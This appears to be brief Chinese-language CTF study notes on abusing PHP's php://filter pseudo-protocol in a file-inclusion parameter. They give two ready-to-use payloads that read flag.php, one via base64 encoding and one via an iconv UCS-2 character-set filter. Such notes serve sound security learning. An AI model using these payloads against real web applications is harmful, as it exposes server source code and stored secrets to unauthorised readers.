伪协议

filter协议的简单利用：
想要读取flag.php文件，可以利用filter伪协议，传参如下：
?file=php://filter/convert.base64-encode/resource=flag.php
这样即可读到flag.php文件base64加密过后的内容

除了使用convert.base64-encode过滤器，还可以使用其他的一些过滤器，比如字符编码类型的，payload如下：
?file=php://filter/read=convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php